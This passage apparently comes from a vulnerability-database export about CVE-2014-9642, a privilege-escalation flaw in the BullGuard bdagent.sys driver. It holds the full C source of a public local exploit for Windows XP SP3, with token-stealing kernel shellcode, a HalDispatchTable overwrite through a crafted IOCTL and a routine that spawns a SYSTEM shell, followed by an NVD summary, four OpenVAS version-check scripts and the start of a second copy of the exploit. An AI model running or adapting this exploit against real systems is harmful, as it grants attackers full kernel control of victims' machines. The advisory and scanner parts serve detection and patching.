_SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS {\r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(\r\n DWORD ProfileSource,\r\n PULONG Interval);\r\n \r\ntypedef void (*FUNCTPTR)();\r\n \r\n \r\n \r\n// Windows XP SP3\r\n \r\n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct\r\n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct\r\n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct\r\n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct\r\n \r\n \r\nBYTE token_steal_xp[] =\r\n{\r\n 0x52, // push edx Save edx on the stack\r\n 0x53, // push ebx Save ebx on the stack\r\n 0x33,0xc0, // xor eax, eax eax = 0\r\n 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD\r\n 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS\r\n 0x8b,0xc8, // mov ecx, eax\r\n 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN\r\n 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks\r\n 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)\r\n 0x75,0xe8, // jne ----\r\n 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX\r\n 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX\r\n 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS\r\n 0x5b, // pop ebx Restores ebx\r\n 0x5a, // pop edx Restores edx\r\n 0xc2,0x08 // ret 8 Away from the kernel \r\n};\r\n \r\n \r\n \r\nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable\r\n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation\r\n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation\r\n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots\r\n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000\r\n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR\r\n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters\r\n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable\r\n \r\n \r\n \r\nDWORD HalDispatchTableAddress()\r\n{\r\n _NtQuerySystemInformation NtQuerySystemInformation;\r\n PSYSTEM_MODULE_INFORMATION pModuleInfo;\r\n DWORD HalDispatchTable;\r\n CHAR kFullName[256];\r\n PVOID kBase = NULL;\r\n LPSTR kName;\r\n HMODULE Kernel;\r\n FUNCTPTR Hal;\r\n ULONG len;\r\n NTSTATUS status;\r\n \r\n \r\n NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation)\r\n {\r\n printf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\");\r\n return -1; \r\n }\r\n \r\n status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);\r\n \r\n if (!status)\r\n {\r\n printf(\"[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\\n\\n\", status);\r\n return -1;\r\n }\r\n \r\n pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);\r\n \r\n if(pModuleInfo == NULL)\r\n {\r\n printf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\");\r\n return -1;\r\n }\r\n \r\n status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);\r\n \r\n memset(kFullName, 0x00, sizeof(kFullName));\r\n strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);\r\n kBase = pModuleInfo->Module[0].Base;\r\n \r\n printf(\"[i] Kernel base name %s\\n\", kFullName);\r\n kName = strrchr(kFullName, '\\\\');\r\n \r\n Kernel = LoadLibraryA(++kName);\r\n \r\n if(Kernel == NULL)\r\n {\r\n printf(\"[-] Failed to load kernel base\\n\\n\");\r\n return -1;\r\n }\r\n \r\n Hal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\");\r\n \r\n if(Hal == NULL)\r\n {\r\n printf(\"[-] Failed to find HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal); \r\n printf(\"[i] Kernel handle 0x%08x\\n\", Kernel);\r\n printf(\"[i] Kernel base address 0x%08x\\n\", kBase); \r\n \r\n HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);\r\n \r\n printf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable);\r\n \r\n if(!HalDispatchTable)\r\n {\r\n printf(\"[-] Failed to calculate HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\n \r\nint GetWindowsVersion()\r\n{\r\n int v = 0;\r\n DWORD version = 0, minVersion = 0, majVersion = 0;\r\n \r\n version = GetVersion();\r\n \r\n minVersion = (DWORD)(HIBYTE(LOWORD(version)));\r\n majVersion = (DWORD)(LOBYTE(LOWORD(version)));\r\n \r\n if (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP;\r\n if (minVersion == 1 && majVersion == 6) v = 2; // \"Windows 7\";\r\n if (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003;\r\n \r\n return v;\r\n}\r\n \r\n \r\nvoid spawnShell()\r\n{\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n \r\n \r\n ZeroMemory(&pi, sizeof(pi));\r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n \r\n si.cb = sizeof(si);\r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOWNORMAL;\r\n \r\n if (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))\r\n {\r\n printf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError());\r\n return;\r\n }\r\n \r\n CloseHandle(pi.hThread);\r\n CloseHandle(pi.hProcess);\r\n}\r\n \r\n \r\nint main(int argc, char *argv[])\r\n{\r\n \r\n _NtQueryIntervalProfile NtQueryIntervalProfile;\r\n LPVOID input[1] = {0}; \r\n LPVOID addrtoshell;\r\n HANDLE hDevice;\r\n DWORD dwRetBytes = 0;\r\n DWORD HalDispatchTableTarget; \r\n ULONG time = 0;\r\n unsigned char devhandle[MAX_PATH];\r\n \r\n \r\n printf(\"-------------------------------------------------------------------------------\\n\");\r\n printf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\");\r\n printf(\" Tested on Windows XP SP3 (32bit) \\n\");\r\n printf(\"-------------------------------------------------------------------------------\\n\\n\");\r\n \r\n if (GetWindowsVersion() == 1)\r\n {\r\n printf(\"[i] Running Windows XP\\n\");\r\n }\r\n \r\n if (GetWindowsVersion() == 0)\r\n {\r\n printf(\"[i] Exploit not supported on this OS\\n\\n\");\r\n return -1;\r\n } \r\n \r\n sprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\");\r\n \r\n NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile)\r\n {\r\n printf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\");\r\n return -1; \r\n }\r\n \r\n addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n \r\n if(addrtoshell == NULL)\r\n {\r\n printf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError());\r\n return -1;\r\n }\r\n printf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell);\r\n \r\n memset(addrtoshell, 0x90, BUFSIZE);\r\n memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));\r\n printf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp));\r\n \r\n hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);\r\n \r\n if (hDevice == INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError());\r\n return -1;\r\n }\r\n else\r\n {\r\n printf(\"[+] Open %s device successful\\n\", devhandle);\r\n }\r\n \r\n HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);\r\n printf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget);\r\n \r\n input[0] = addrtoshell; // input buffer contents gets written to our output buffer address\r\n \r\n printf(\"[+] Input buffer contents %08x\\n\", input[0]);\r\n \r\n printf(\"[~] Press any key to send Exploit . . .\\n\");\r\n getch();\r\n \r\n DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n \r\n printf(\"[+] Buffer sent\\n\");\r\n \r\n printf(\"[+] Spawning SYSTEM Shell\\n\");\r\n NtQueryIntervalProfile(2, &time);\r\n spawnShell();\r\n \r\n printf(\"[+] Restoring Hal dispatch table pointers\\n\\n\");\r\n \r\n DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n \r\n CloseHandle(hDevice);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-09] #", "published": "2015-02-04T00:00:00", "references": [], "reporter": "Parvez Anwar", "modified": "2015-02-04T00:00:00", "href": "https://0day.today/exploit/description/23244"}
{"cve": [{"lastseen": "2016-09-03T21:40:30", "bulletinFamily": "NVD", "description": "bdagent.sys in BullGuard Antivirus, Internet Security, Premium Protection, and Online Backup before 15.0.288 allows local users to write data to arbitrary memory locations, and consequently gain privileges, via a crafted 0x0022405c IOCTL call.", "modified": "2015-02-09T11:09:34", "published": "2015-02-06T10:59:10", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9642", "id": "CVE-2014-9642", "title": "CVE-2014-9642", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:39:46", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Premium Protection and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-13T00:00:00", "id": "OPENVAS:1361412562310805277", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805277", "title": "BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_pp_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:premium_protection\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805277\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-13 12:27:54 +0530 (Fri, 13 Feb 2015)\");\n script_name(\"BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Premium Protection and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard Premium Protection before\n version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Premium Protection\n version 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_premium_protection_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Premium/Protection/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:38:28", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Backup and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805278", "title": "BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_backup_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:online_backup\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805278\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 17:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Backup and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard Backup before version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Backup version\n 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_backup_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Backup/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:15", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n AntiVirus and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805275", "title": "BullGuard AntiVirus 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_av_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard AntiVirus 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:antivirus\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805275\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 17:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard AntiVirus 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n AntiVirus and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard AntiVirus before version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard AntiVirus version\n 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_antivirus_detect.nasl\");\n script_mandatory_keys(\"BullGuard/AntiVirus/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:27", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Internet Security and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805276", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805276", "title": "BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_is_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:internet_security\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805276\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 19:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Internet Security and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard Internet Security before\n version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Internet Security\n version 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_internet_security_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Internet/Security/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T02:27:38", "bulletinFamily": "exploit", "description": "BullGuard Multiple Products - Arbitrary Write Privilege Escalation. CVE-2014-9642. Local exploit for windows platform", "modified": "2015-02-04T00:00:00", "published": "2015-02-04T00:00:00", "id": "EDB-ID:35994", "href": "https://www.exploit-db.com/exploits/35994/", "type": "exploitdb", "title": "BullGuard Multiple Products - Arbitrary Write Privilege Escalation", "sourceData": "/*\r\n\r\nExploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation\r\nDate - 04th February 2015\r\nDiscovered by - Parvez Anwar (@parvezghh)\r\nVendor Homepage - http://www.bullguard.com/\r\nTested Version - 14.1.285.4\r\nDriver Version - 1.0.0.6 - BdAgent.sys\r\nTested on OS - 32bit Windows XP SP3 \r\nOSVDB - http://www.osvdb.org/show/osvdb/114478\r\nCVE ID - CVE-2014-9642\r\nVendor fix url - http://www.bullguard.com/about/release-notes.aspx\r\nFixed Version - 15.0.288.1\r\nFixed driver ver - 1.0.0.7\r\n\r\n\r\n\r\nNote\r\n----\r\nOverwritten HAL dispatch table after exploit \r\n\r\nkd> dps nt!HalDispatchTable l c\r\n8054ccb8 00000003\r\n8054ccbc 00340000\r\n8054ccc0 00010000\r\n8054ccc4 0a060002\r\n8054ccc8 ee657645\r\n8054cccc 00000001\r\n8054ccd0 00000001\r\n8054ccd4 867c1bf0\r\n8054ccd8 80613f7b nt!IoSetPartitionInformation\r\n8054ccdc 806141ef nt!IoWritePartitionTable\r\n8054cce0 8052d157 nt!CcHasInactiveViews\r\n8054cce4 804e42d1 nt!ObpTraceDepth+0x19\r\n\r\n7 pointers get overwritten. Since input buffer is in our control and pointers\r\nare static in XP I've triggered the overwrite again restoring the pointers.\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define BUFSIZE 4096\r\n\r\n\r\ntypedef struct 